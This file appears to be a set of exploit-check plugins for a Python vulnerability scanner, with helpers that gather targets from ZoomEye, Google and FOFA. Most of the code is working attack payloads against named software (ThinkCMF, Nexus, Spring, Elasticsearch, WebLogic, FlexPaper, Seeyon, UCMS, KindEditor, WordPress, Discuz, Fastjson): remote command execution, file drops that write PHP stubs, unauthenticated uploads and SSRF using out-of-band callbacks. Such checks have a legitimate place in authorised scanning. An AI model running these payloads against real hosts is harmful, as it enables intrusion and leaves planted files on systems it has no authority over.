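async def prove(self):
    """Probe ``target_host:target_port`` for an open (unauthenticated) proxy.

    One out-of-band URL from ``self.ceye_dns_api(t='url')`` is requested two
    ways: first through the port as a SOCKS5 proxy (OPTIONS via a
    ``SocksConnector``), then through it as a plain HTTP proxy (GET with
    ``proxy=``).  A body containing 'HTTP Record Insert Success' means the
    port relayed the request to the callback endpoint; ``self.flag`` is set,
    ``{"info": <proxy url>, "key": "proxy unauth"}`` is appended to
    ``self.res`` and the method returns on the first hit.

    Fix: the SOCKS5 probe was unguarded, so a listener that is not a SOCKS
    server (reset, handshake error) raised out of the coroutine before the
    HTTP-proxy probe ever ran.  The SOCKS probe is now best-effort; the HTTP
    probe propagates errors exactly as before.
    """
    socks_proxy = 'socks5://{}:{}'.format(self.target_host, str(self.target_port))
    connector = SocksConnector.from_url(socks_proxy)
    url = self.ceye_dns_api(t='url')
    try:
        async with ClientSession(connector=connector) as session:
            async with session.options(url=url) as res1:
                if res1:
                    text1 = await res1.text()
                    if 'HTTP Record Insert Success' in text1:
                        self.flag = 1
                        self.res.append({"info": socks_proxy, "key": "proxy unauth"})
                        return
    except Exception:
        # Not a SOCKS5 listener (or it dropped the handshake): still try the
        # same port as an HTTP proxy below instead of aborting the check.
        pass
    http_proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port))
    async with ClientSession() as session:
        async with session.get(url=url, proxy=http_proxy) as res2:
            if res2:
                text2 = await res2.text()
                if 'HTTP Record Insert Success' in text2:
                    self.flag = 1
                    self.res.append({"info": http_proxy, "key": "proxy unauth"})
                    return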
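async def prove(self):
    """Probe ``target_host:target_port`` for an open proxy using example.com.

    ``http://example.com/`` is fetched first through the port as a SOCKS5
    proxy (``SocksConnector``), then through it as an HTTP proxy (``proxy=``).
    A body containing 'More information...' (text on the example.com landing
    page) means the port relayed the request; ``self.flag`` is set,
    ``{"info": <proxy url>, "key": "proxy unauth"}`` is appended to
    ``self.res`` and the method returns on the first hit.

    Fix: the SOCKS5 probe was unguarded, so a non-SOCKS listener raised out
    of the coroutine before the HTTP-proxy probe ran.  The SOCKS probe is now
    best-effort; the HTTP probe propagates errors exactly as before.
    """
    socks_proxy = 'socks5://{}:{}'.format(self.target_host, str(self.target_port))
    connector = SocksConnector.from_url(socks_proxy)
    url = 'http://example.com/'
    try:
        async with ClientSession(connector=connector) as session:
            async with session.get(url=url) as res1:
                if res1:
                    text1 = await res1.text()
                    if 'More information...' in text1:
                        self.flag = 1
                        self.res.append({"info": socks_proxy, "key": "proxy unauth"})
                        return
    except Exception:
        # Not a SOCKS5 listener (or it dropped the handshake): fall through
        # and still try the port as an HTTP proxy.
        pass
    http_proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port))
    async with ClientSession() as session:
        async with session.get(url=url, proxy=http_proxy) as res2:
            if res2:
                text2 = await res2.text()
                if 'More information...' in text2:
                    self.flag = 1
                    self.res.append({"info": http_proxy, "key": "proxy unauth"})
                    return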
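async def _zoomeye_api(search, page, z_type):
    """Async generator: yield one list of ZoomEye hits per result page.

    Example ``search``: ``app:"Drupal" country:"JP"``.  The documented login
    call is::

        curl -X POST https://api.zoomeye.org/user/login -d '{"username": "...", "password": "..."}'

    Credentials are read from ``conf['zoomeye_api']``; the ``access_token``
    in the reply is sent as a ``JWT`` Authorization header on every search.
    ``z_type`` selects ``/web/search`` (URLs scraped from the raw body with
    a regex) or ``/host/search`` (``ip:port`` strings built from the JSON
    ``matches``).  Each page yields a list; a failed page yields ``[]``.
    Config, login or token (422) failures log and ``sys.exit``.

    Fix: an unknown ``z_type`` used to yield ``None`` and then *continue*
    into the page loop with ``url_api = None`` — every page then hit the
    broad ``except`` and yielded ``[]``.  The generator now stops right
    after yielding ``None``.

    NOTE(review): ``url_login`` is the redacted placeholder ``'******'`` in
    this copy and must be filled in before use.  The ``KeyError`` branch
    also fires when the login reply has no ``access_token`` (bad
    credentials), so its config-error message can be misleading.
    """
    headers = {}
    url_login = '******'
    try:
        data = {
            'username': conf['zoomeye_api']['username'],
            'password': conf['zoomeye_api']['password']
        }
        async with ClientSession() as session:
            async with session.post(url=url_login, json=data, headers=headers) as response:
                if response:
                    res = await response.text()
                    headers["Authorization"] = "JWT " + json.loads(res)['access_token']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: zoomeye_api, please check the config in tentacle.conf."))
    except AttributeError:
        sys.exit(logger.error("Zoomeye api error: the response is none."))
    except Exception as e:
        sys.exit(logger.error("Zoomeye api error: %s" % type(e).__name__))
    if z_type.lower() == 'web':
        url_api = "https://api.zoomeye.org/web/search"
    elif z_type.lower() == 'host':
        url_api = "https://api.zoomeye.org/host/search"
    else:
        logger.error("Error zoomeye api with type {0}.".format(z_type))
        yield None
        # Nothing sensible can be queried without an endpoint.
        return
    logger.sysinfo("Using zoomeye api with type {0}.".format(z_type))
    async with ClientSession() as session:
        for n in range(1, page + 1):
            logger.debug("Find zoomeye url of %d page..." % int(n))
            try:
                data = {'query': search, 'page': str(n)}
                async with session.get(url=url_api, params=data, headers=headers) as response:
                    if response:
                        res = await response.text()
                        # 422 is what the API returns for a rejected token.
                        if int(response.status) == 422:
                            sys.exit(logger.error("Error zoomeye api token."))
                        if z_type.lower() == 'web':
                            # Regex over the JSON body; brittle if the API
                            # changes key spacing, kept for compatibility.
                            result = re.compile('"url": "(.*?)"').findall(res)
                        elif z_type.lower() == 'host':
                            result = [str(item['ip']) + ':' + str(item['portinfo']['port'])
                                      for item in json.loads(res)['matches']]
                        logger.debug("Zoomeye Found: %s" % result)
                        yield result
            except Exception:
                # A bad page (network error, unexpected JSON) yields an empty
                # page rather than ending the whole search.
                yield []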
async def prove(self):
    """ThinkCMF 2.2.3 template injection check (``Api/Plugin/fetch``).

    For each candidate base path a crafted ``templateFile``/``content`` body
    is POSTed to ``index.php?g=Api&m=Plugin&a=fetch``; the injected
    ``<php>`` block writes ``bytestforme2.php`` (a ``phpinfo()`` stub).  A
    follow-up GET of that file whose body contains 'php.ini' confirms
    execution and records "thinkcmf 2.2.3 template inject".

    NOTE(review): a hit leaves ``bytestforme2.php`` on the target; remove it
    after the engagement.  The follow-up URL is ``path + "/bytestforme2.php"``;
    whether ``path`` already ends in ``/`` depends on ``url_normpath``.
    """
    await self.get_url()
    if not self.base_url:
        return
    candidates = {
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.url, './'),
    }
    probe_body = ("templateFile=/../../../public/index&prefix=''&content="
                  "<php>file_put_contents('bytestforme2.php','<?php phpinfo();')</php>")
    async with ClientSession() as session:
        for base in candidates:
            fetch_url = base + "index.php?g=Api&m=Plugin&a=fetch"
            async with session.post(url=fetch_url, data=probe_body) as inject_res:
                if inject_res is None or inject_res.status != 200:
                    continue
                async with session.get(url=base + "/bytestforme2.php") as stub_res:
                    if stub_res is None or stub_res.status != 200:
                        continue
                    if 'php.ini' in await stub_res.text():
                        self.flag = 1
                        self.req.append({"flag": fetch_url})
                        self.res.append({
                            "info": fetch_url,
                            "key": "thinkcmf 2.2.3 template inject"
                        })
async def prove(self):
    """Nexus Repository Manager 3 CVE-2019-7238: JEXL injection via ``previewAssets``.

    POSTs an Ext.Direct ``coreui_Component.previewAssets`` call to
    ``service/extdirect`` whose ``expression`` filter is JEXL reaching
    ``Runtime.exec`` with ``ping <oob-dns-token>``; a later
    ``ceye_verify_api(dns, t='dns')`` hit sets ``self.flag`` and records
    "CVE-2019-7238".  (The token key ``cve20197328`` is just a label.)
    """
    await self.get_url()
    if self.base_url:
        path_list = list(
            set([
                self.url_normpath(self.base_url, '/'),
                self.url_normpath(self.base_url, '/nexus3/'),
            ]))
        async with ClientSession() as session:
            for path in path_list:
                url = path + 'service/extdirect'
                headers = {"Content-Type": "application/json"}
                dns = self.ceye_dns_api(k='cve20197328', t='dns')
                cmd = 'ping ' + dns
                # NOTE(review): the text ``.format(self.BANNER, self.DOMAIN)`` sits
                # *inside* this string literal (after the closing quote of
                # ``waitFor()``), so it is sent verbatim and breaks the JSON; and
                # ``cmd`` is spliced into the JEXL ``exec(...)`` without quotes.
                # Left unchanged here: repairing the payload needs re-validation
                # against a target.
                data = '{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName(\'java.lang.Runtime\').getRuntime().exec(' + cmd + ').waitFor()".format(self.BANNER, self.DOMAIN)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}'
                # NOTE(review): ``data`` is already a serialized JSON string but is
                # passed as ``json=``, which re-encodes it as a JSON *string
                # literal* ("{...}"), not the object.  ``data=data`` together with
                # the explicit Content-Type above is what this intends.
                async with session.post(url=url, json=data, headers=headers) as res:
                    await asyncio.sleep(1)
                    if await self.ceye_verify_api(dns, t='dns'):
                        self.flag = 1
                        self.res.append({
                            "info": url,
                            "key": "CVE-2019-7238"
                        })
                        return
async def prove(self):
    """WebLogic console authentication bypass CVE-2020-14750 check.

    Requests ``console/css/%252e%252e%252fconsole.portal`` (double-encoded
    ``../`` in front of the console page) without following redirects.  A
    302 is expected first; its cookies are replayed on a second request and,
    if that one is not a 404, the body is inspected for console markers
    (``base_domain`` + ``SecurityRealmRealmTablePage``, ``Home Page``, or
    ``WebLogic Server Console`` + ``console.portal``).  A match sets
    ``self.flag`` and records "weblogic CVE-2020-14750".
    """
    await self.get_url()
    if not self.base_url:
        return
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    bypass_url = self.base_url + 'console/css/%252e%252e%252fconsole.portal'
    async with ClientSession() as session:
        async with session.get(url=bypass_url, headers=headers, allow_redirects=False) as first:
            if first is None or first.status != 302:
                return
            session_cookies = first.cookies
            async with session.get(url=bypass_url, cookies=session_cookies, headers=headers,
                                   allow_redirects=False) as second:
                if second is None or second.status == 404:
                    return
                text = await second.text()
                # Same grouping as the original expression (``and`` binds
                # tighter than ``or``), written out explicitly.
                looks_like_console = (
                    ('base_domain' in text and 'SecurityRealmRealmTablePage' in text)
                    or 'Home Page' in text
                    or ('WebLogic Server Console' in text and 'console.portal' in text)
                )
                if looks_like_console:
                    self.flag = 1
                    self.res.append({
                        "info": bypass_url,
                        "key": "weblogic CVE-2020-14750"
                    })
async def prove(self):
    """Spring Data Commons CVE-2018-1273 (SpEL via property binding) check.

    Three ``username[<SpEL>]=test`` bodies are sent to each candidate path;
    the expressions reach ``ProcessBuilder``/``Runtime.exec``/a JS engine to
    echo ``spring_test``.  That marker in the reply sets ``self.flag`` and
    records "Spring RCE CVE-2018-1273"; ``break`` moves on to the next path.
    """
    await self.get_url()
    if self.base_url:
        path_list = list(
            set([
                self.url_normpath(self.base_url, '/'),
                self.url_normpath(self.url, './'),
                self.url_normpath(self.url, '')
            ]))
        async with ClientSession() as session:
            for path in path_list:
                # NOTE(review): in the first payload ``split(' ')`` is not a
                # quoted space — the ``'`` closes the Python literal and the
                # next ``'`` reopens it (implicit concatenation), so the body
                # actually sent reads ``.split().getClass()``.  If a space
                # separator was intended the quote must be escaped.
                datas = [
                    'username[(#root.getClass().forName("java.lang.ProcessBuilder").getConstructor(\'foo\'.split(' ').getClass()).newInstance(\'ecxxho%20springxx_test\'.split(\'xx\'))).start()]=test',
                    'username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\'echo%20spring_test\')")]=test',
                    'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("echo%20spring_test")]=test'
                ]
                for _data in datas:
                    # NOTE(review): this is a GET carrying a form body; whether
                    # the container binds body parameters on GET is
                    # target-dependent (public PoCs for this CVE use POST).
                    # Left unchanged.
                    async with session.get(
                        url=path,
                        data=_data,
                    ) as res:
                        if res:
                            text = await res.text()
                            if "spring_test" in text:
                                self.flag = 1
                                self.res.append({
                                    "info": path,
                                    "key": "Spring RCE CVE-2018-1273"
                                })
                                break
async def prove(self):
    """WordPress ``xmlrpc.php`` ``pingback.ping`` SSRF check (OOB DNS).

    For each candidate base path a pingback is POSTed whose source URL is
    ``http://<dns token>/``; a vulnerable site resolves/fetches it, which
    ``ceye_verify_api(dns, 'dns')`` observes.  A hit sets ``self.flag``,
    appends ``{"url": ...}`` to ``self.req`` and records
    "wordpress xmlrpc ssrf"; the loop stops at the first hit.
    """
    await self.get_url()
    if not self.base_url:
        return
    candidates = {
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.base_url, '../wordpress/'),
        self.url_normpath(self.url, './'),
    }
    headers = {"Content-Type": "text/xml"}
    async with ClientSession() as session:
        for base in candidates:
            # A fresh callback token is requested per base path.
            dns = self.ceye_dns_api(k='xmlrpc', t='dns')
            xmlrpc_url = base + 'xmlrpc.php'
            body = '''<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://{dns}/</string></value></param>
<param><value><string>{path}?p=1</string></value></param>
</params>
</methodCall>'''.format(dns=dns, path=base)
            async with session.post(url=xmlrpc_url, data=body, headers=headers) as res:
                if res is None:
                    continue
                # Give the target a moment to perform the pingback lookup.
                await asyncio.sleep(1)
                if await self.ceye_verify_api(dns, 'dns'):
                    self.flag = 1
                    self.req.append({"url": xmlrpc_url})
                    self.res.append({
                        "info": xmlrpc_url,
                        "key": "wordpress xmlrpc ssrf"
                    })
                    break
async def prove(self):
    """Seeyon ``htmlofficeservlet`` arbitrary file write (text-marker variant).

    If ``seeyon/htmlofficeservlet`` answers with 'DBSTEP V3.0', a DBSTEP
    request is POSTed whose FILENAME is a custom-alphabet base64
    (project ``base64encode`` with ``table``) of
    ``..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test<random>.txt``; the
    servlet writes the trailing marker text there.  Fetching
    ``seeyon/test<random>.txt`` and seeing 'this is a test for me' proves
    the write; recorded as "seeyon getshell".

    NOTE(review): the marker file stays on the target; clean it up.
    """
    await self.get_url()
    if not self.base_url:
        return
    alphabet = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
    marker_name = 'test' + str(random.randint(100000, 999999)) + '.txt'
    encoded_path = str(base64encode(
        '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(marker_name), alphabet))
    servlet_url = self.base_url + 'seeyon/htmlofficeservlet'
    async with ClientSession() as session:
        async with session.get(url=servlet_url) as banner:
            if banner is None or 'DBSTEP V3.0' not in await banner.text():
                return
            body = '''DBSTEP V3.0 355 0 22 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format(encoded_path)
            async with session.post(url=servlet_url, data=body) as write_res:
                # Let the servlet finish writing before reading back.
                await asyncio.sleep(1)
                marker_url = self.base_url + 'seeyon/' + marker_name
                async with session.get(url=marker_url) as marker_res:
                    if marker_res is None:
                        return
                    if 'this is a test for me' in await marker_res.text():
                        self.flag = 1
                        self.res.append({
                            "info": marker_url,
                            "key": 'seeyon getshell'
                        })
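async def _google_api(search, page):
    '''Async generator: yield result links from the Google Custom Search JSON API.

    https://console.developers.google.com
    https://developers.google.com/custom-search/v1/cse/list
    poc-t search engine id: 011385053819762433240:ljmmw2mhhau
    https://cse.google.com.hk/cse?cx=011385053819762433240:ljmmw2mhhau&gws_rd=cr

    ``developer_key`` and ``search_enging`` (sic — the config key) come from
    ``conf['google_api']``; a missing key logs and ``sys.exit``s.  Pages
    ``0..page-1`` are fetched ten hits at a time (``start`` = 1, 11, 21, ...).
    A non-200 status (typically the 100 queries/day free quota) logs and
    stops; a reply without ``items`` also stops.

    Fixes: the query is now sent via ``params=`` so ``search`` and the key
    are URL-encoded instead of pasted raw into the URL — a ``&`` or ``#`` in
    a dork previously split or truncated the query.  The bare ``except``
    around the item loop is narrowed to the errors it was masking (missing
    ``items`` -> ``None``, or an item that is not a dict).

    NOTE(review): the developer key travels in the query string and will
    appear in any URL-level request logging.
    '''
    try:
        developer_key = conf['google_api']['developer_key']
        search_enging = conf['google_api']['search_enging']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: google_api, please check the config in tentacle.conf."))
    base_url = 'https://www.googleapis.com/customsearch/v1'
    async with ClientSession() as session:
        for p in range(0, page):
            params = {
                'cx': search_enging,
                'key': developer_key,
                'num': '10',
                'start': str(p * 10 + 1),
                'q': search,
            }
            async with session.get(url=base_url, params=params) as response:
                if not response:
                    continue
                res = await response.text()
                if int(response.status) != 200:
                    logger.error("Error google api access, and api rate limit 100/day, maybe you should pay money and enjoy service.")
                    break
                res_json = json.loads(res)
                items = res_json.get('items')
                if items is None:
                    # No "items" key: end of results (or an error body).
                    break
                try:
                    links = [item.get('link') for item in items]
                except (AttributeError, TypeError):
                    # Unexpected shape — stop, as the original did.
                    break
                for link in links:
                    yield link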
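async def prove(self):
    """UCMS ``uploadpic_html.jsp`` unauthenticated file upload check.

    POSTs a small XML body (its text node is base64 of ``test by me``) to
    ``cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx``
    under each candidate base path.  If that answers 200, the expected
    landing path ``cms-data/temp_dir/xxxx/temp.files/justfortest.jsp`` is
    requested; 'test by me' in its body proves the upload was written and is
    served.  Recorded as "ucms upload" with the landing URL.

    Fix: the status test was ``res.status is 200`` — identity comparison on
    an int (a SyntaxWarning on current Python; it only worked because
    CPython caches small ints).  It is now ``== 200``.

    NOTE(review): ``justfortest.jsp`` is left on the target; remove it after
    testing.  The read-back is a POST of the same XML, as in the original.
    """
    await self.get_url()
    if not self.base_url:
        return
    xmldata = '''
<?xml version="1.0" encoding="UTF-8"?>
<root>
dGVzdCBieSBtZQ==
</root>
'''
    path_list = list(set([
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.base_url, '../ucms/'),
        self.url_normpath(self.url, 'ucms/'),
        self.url_normpath(self.url, '../ucms/'),
    ]))
    async with ClientSession() as session:
        for path in path_list:
            upload_url = path + 'cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx'
            async with session.post(url=upload_url, data=xmldata) as upload_res:
                if upload_res is None or upload_res.status != 200:
                    continue
                landed_url = path + 'cms-data/temp_dir/xxxx/temp.files/justfortest.jsp'
                async with session.post(url=landed_url, data=xmldata) as fetch_res:
                    if fetch_res is None:
                        continue
                    text = await fetch_res.text()
                    if 'test by me' in text:
                        self.flag = 1
                        self.req.append({"page": landed_url})
                        self.res.append({
                            "info": landed_url,
                            "key": "ucms upload"
                        })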
async def prove(self):
    """FlexPaper 2.3.6 ``setup.php`` command injection → file-drop check.

    Step 1 POSTs a config form (``SAVE_CONFIG=1``) to
    ``flexpaper/php/change_config.php``.  Step 2 requests
    ``setup.php?step=2&PDF2SWF_PATH=`` with a percent-encoded shell snippet
    (decoded: ``echo PD9waHAgcGhwaW5mbygpOz8+ |base64 -d >$(pwd)/testforme.php``,
    which writes ``<?php phpinfo();?>``).  Step 3 fetches
    ``flexpaper/php/testforme.php``; 'php.ini' in the body means the injected
    command ran.  Recorded as "flexpaper_236_getshell"; returns on first hit.

    NOTE(review): ``testforme.php`` remains on the target after a hit.
    """
    await self.get_url()
    if not self.base_url:
        return
    bases = {
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.url, './'),
    }
    config_form = (
        ("SAVE_CONFIG", "1"),
        ("PDF_Directory", "/var/www/html/flex2.3.6/flexpaper/pdf"),
        ("SWF_Directory", "config/"),
        ("LICENSEKEY", ""),
        ("splitmode", "1"),
        ("RenderingOrder_PRIM", "flash"),
        ("RenderingOrder_SEC", "html"),
    )
    injected = "%65%63%68%6f%20%50%44%39%77%61%48%41%67%63%47%68%77%61%57%35%6d%62%79%67%70%4f%7a%38%2b%20%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%65%73%74%66%6f%72%6d%65%2e%70%68%70"
    async with ClientSession() as session:
        for base in bases:
            config_url = base + "flexpaper/php/change_config.php"
            setup_url = base + "flexpaper/php/setup.php?step=2&PDF2SWF_PATH=" + injected
            dropped_url = base + 'flexpaper/php/testforme.php'
            async with session.post(url=config_url, data=config_form) as step1:
                if step1 is None or step1.status != 200:
                    continue
                async with session.get(url=setup_url) as step2:
                    if step2 is None or step2.status != 200:
                        continue
                    async with session.get(url=dropped_url) as step3:
                        if step3 is None:
                            continue
                        if "php.ini" in await step3.text():
                            self.flag = 1
                            self.req.append({"url": dropped_url})
                            self.res.append({"info": dropped_url, "key": "flexpaper_236_getshell"})
                            return
async def prove(self):
    """Discuz! X3.4 SSRF through the wechat plugin ``avatar`` parameter.

    ``plugin.php?id=wechat:wechat&ac=wxregister`` is requested with
    ``avatar`` set to an out-of-band URL token and a random ``wxopenid``;
    a vulnerable install fetches the avatar, which
    ``ceye_verify_api(token, 'http')`` observes.  A hit sets ``self.flag``,
    appends ``{"flag": url}`` to ``self.req`` and records "discuz x3.4 ssrf".
    """
    await self.get_url()
    if not self.base_url:
        return
    bases = {
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.url, './'),
    }
    async with ClientSession() as session:
        for base in bases:
            callback = self.ceye_dns_api(t='url')
            # Random openid so repeated runs do not collide on the target.
            openid = ''.join(random.choice(ascii_lowercase) for _ in range(8))
            probe_url = base + "plugin.php?id=wechat:wechat&ac=wxregister&username=vov&avatar=%s&wxopenid=%s" % (callback, openid)
            async with session.get(url=probe_url) as res:
                if res is None:
                    continue
                await asyncio.sleep(1)
                if await self.ceye_verify_api(callback, 'http'):
                    self.flag = 1
                    self.req.append({"flag": probe_url})
                    self.res.append({
                        "info": probe_url,
                        "key": "discuz x3.4 ssrf"
                    })
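async def prove(self):
    """KindEditor ``php/upload_json.php`` unrestricted upload check.

    Uploads a plain-text ``mytestforyou.html`` as ``imgFile`` with
    ``dir=file`` under each candidate base path.  A JSON reply whose ``url``
    contains 'kindeditor' means the server accepted and stored the file.
    A hit appends ``{"url": <endpoint>}`` to ``self.req`` and a ``self.res``
    entry whose ``key`` is (as in the original) the endpoint URL.

    Fix: the bare ``except: pass`` around the JSON handling is narrowed to
    the failures it was covering — a non-JSON body (``ValueError``), a reply
    that is not an object (``AttributeError`` on ``.keys()``) or a ``url``
    value that is not a string (``TypeError``).  A bare ``except`` in a
    coroutine also swallowed ``CancelledError``; this no longer does.

    NOTE(review): on a vulnerable host the uploaded HTML stays reachable —
    an artifact to remove after testing.
    """
    await self.get_url()
    if not self.base_url:
        return
    bases = list(set([
        self.url_normpath(self.base_url, '/'),
        self.url_normpath(self.url, './'),
        self.url_normpath(self.url, '../'),
    ]))
    async with ClientSession() as session:
        for base in bases:
            upload_url = base + "kindeditor/php/upload_json.php?dir=file"
            form = FormData()
            form.add_field('imgFile', "this is a test for you. ",
                           filename='mytestforyou.html',
                           content_type='text/plain')
            async with session.post(url=upload_url, data=form) as response:
                if response is None:
                    continue
                text = await response.text()
                try:
                    reply = json.loads(text)
                    accepted = 'url' in reply.keys() and 'kindeditor' in reply['url']
                except (ValueError, AttributeError, TypeError):
                    continue
                if accepted:
                    self.flag = 1
                    self.req.append({"url": upload_url})
                    self.res.append({"info": upload_url, "key": upload_url})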
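async def prove(self):
    r'''Elasticsearch CVE-2015-1427 (Groovy sandbox bypass) check.

    The Java equivalent of the injected script is:

        String s1 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).useDelimiter("\\A").next();
        // \A means "start of string", and \z means "end of string".
        String s2 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).next();
        System.out.println(s1)

    A ``script_fields`` query with ``"lang": "groovy"`` is POSTed to
    ``_search?pretty``; the script reflectively reaches ``Runtime.exec`` to
    run ``echo <random 6 digits>`` and returns the output lines.  The random
    number in the response proves execution; recorded as "CVE-2015-1427".

    Fix: inside the JSON the class names are escaped as ``\\"`` in the
    Python source (``\"`` on the wire), except ``java.io.InputStreamReader``
    which used a single ``\"`` — Python turned that into a bare ``"`` and
    the JSON body was malformed.  All three are now escaped the same way.

    NOTE(review): the Content-Type is form-urlencoded for a JSON body, as in
    the original; left unchanged.
    '''
    await self.get_url()
    if not self.base_url:
        return
    ran = str(random.randint(100000, 999999))
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    _data = '''
{
    "size":1,
    "script_fields": {
        "test#": {
            "script": "java.lang.Math.class.forName(\\"java.io.BufferedReader\\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\\"java.io.InputStreamReader\\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"echo ''' + ran + '''\\").getInputStream())).readLines()",
            "lang": "groovy"
        }
    }
}
'''
    async with ClientSession() as session:
        url = self.base_url + '_search?pretty'
        async with session.post(url=url, headers=headers, data=_data) as res:
            if res is None:
                return
            text = await res.text()
            if ran in text:
                self.flag = 1
                self.req.append({"url": url})
                self.res.append({"info": url, "key": "CVE-2015-1427"})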
async def prove(self):
    """WebLogic CVE-2018-2894: unauthenticated upload via ``ws_utc`` keystore.

    ``get_new_work_path`` / ``set_new_upload_path`` (project helpers) point
    the WS test client's work directory somewhere web-reachable; then a
    keystore form whose ``ks_filename`` part carries ``prove_content`` as
    ``myTestFile.txt`` is POSTed to ``ws_utc/resources/setting/keystore``.
    The last ``<id>`` in the reply names the stored file at
    ``ws_utc/css/config/keystore/<id>_myTestFile.txt``; ``upload_content``
    in that file confirms the write.  Recorded as "CVE-2018-2894".

    NOTE(review): ``prove_content``, ``upload_content`` and ``headers`` are
    not defined in this method and must be module-level names; the upload
    sends ``prove_content`` but verifies ``upload_content`` — confirm they
    match.  The uploaded file stays on the server.
    """
    await self.get_url()
    if not self.base_url:
        return
    base = self.base_url
    async with ClientSession() as session:
        work_path = await self.get_new_work_path(session, base)
        if not await self.set_new_upload_path(session, base, work_path):
            return
        form = aiohttp.FormData()
        for field, value in (('ks_edit_mode', 'false'),
                             ('ks_password_front', 'mytest'),
                             ('ks_password_changed', 'true')):
            form.add_field(field, value)
        form.add_field('ks_filename', prove_content,
                       filename="myTestFile.txt",
                       content_type='application/octet-stream')
        async with session.post(url=base + "ws_utc/resources/setting/keystore", data=form) as upload_res:
            if not upload_res:
                return
            ids = re.findall("<id>(.*?)</id>", await upload_res.text())
            if not ids:
                return
            stored_url = self.base_url + "ws_utc/css/config/keystore/" + str(ids[-1]) + "_myTestFile.txt"
            async with session.get(url=stored_url, headers=headers) as fetch_res:
                if fetch_res and upload_content in await fetch_res.text():
                    self.flag = 1
                    self.res.append({"info": stored_url, "key": "CVE-2018-2894"})
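async def prove(self):
    """Fastjson autotype DNS probe via ``java.net.Inet4Address``/``Inet6Address``.

    Two JSON bodies whose ``@type`` is ``java.net.Inet4Address`` /
    ``Inet6Address`` with ``val`` set to an out-of-band DNS token
    (``self.ceye_dns_api(k='fjinfo', t='dns')``) are POSTed to every URL
    from ``self.url_normpath(self.url, './')``.  A parser that instantiates
    the class resolves the name, which ``ceye_verify_api(dns, 'dns')`` sees
    once all bodies have been sent; a hit sets ``self.flag`` and records
    ``{"info": <last url tried>, "key": dns}``.  Send errors are ignored.

    Fix: the bare ``except:`` around the POST is now ``except Exception:`` —
    a bare except inside a coroutine also swallowed ``CancelledError`` and
    ``KeyboardInterrupt``.

    NOTE(review): ``self.url_normpath(self.url, './')`` is iterated here,
    whereas other checks use its result as a single path — confirm it
    returns a collection in this call form.
    """
    await self.get_url()
    if not self.base_url:
        return
    dns = self.ceye_dns_api(k='fjinfo', t='dns')
    pocs = [
        {"test": {"@type": "java.net.Inet4Address", "val": dns}},
        {"test": {"@type": "java.net.Inet6Address", "val": dns}},
    ]
    async with ClientSession() as session:
        for poc in pocs:
            for url in self.url_normpath(self.url, './'):
                try:
                    async with session.post(url=url, json=poc) as res:
                        pass
                except Exception:
                    # Best effort: an unreachable path must not stop the probe.
                    pass
        if await self.ceye_verify_api(dns, 'dns'):
            self.flag = 1
            self.res.append({"info": url, "key": dns})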
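async def _fofa_api(search, page, flag = True):
    '''Async generator: yield the first column (host/URL) of each FOFA hit.

    https://fofa.so/api#auth

    ``email``/``token`` come from ``conf['fofa_api']``; ``search`` is
    base64-encoded with the project's ``base64encode`` and sent as
    ``qbase64``.  Pages ``1..page`` are POSTed to ``url_login``; a 401 logs
    and ``sys.exit``s, a page whose ``error`` is ``None`` and whose
    ``results`` are empty ends the iteration.  ``flag`` only controls the
    "Using fofa api..." log line.

    Fixes: the config-error message named the section ``zfofa_api``; it now
    says ``fofa_api`` to match the key actually read.  A reply without a
    ``results`` list no longer raises ``TypeError`` from ``len(None)``; it
    ends the iteration like an empty page.

    NOTE(review): ``url_login`` is the redacted placeholder ``'******'`` in
    this copy and must be filled in.  Email and API key travel in the query
    string, so they appear in URL-level logging.  ``qbase64`` is pasted raw
    into the query; a ``+`` in the base64 may reach the server as a space
    unless the client percent-encodes it — passing the fields via
    ``params=`` would guarantee that (left as is to keep the request shape).
    '''
    url_login = '******'
    try:
        email = conf['fofa_api']['email']
        key = conf['fofa_api']['token']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: fofa_api, please check the config in tentacle.conf."))
    if flag:
        logger.sysinfo("Using fofa api...")
    search = str(base64encode(search))
    async with ClientSession() as session:
        for p in range(1, page + 1):
            logger.debug("Find fofa url of %d page..." % int(p))
            query_url = url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key, p, search)
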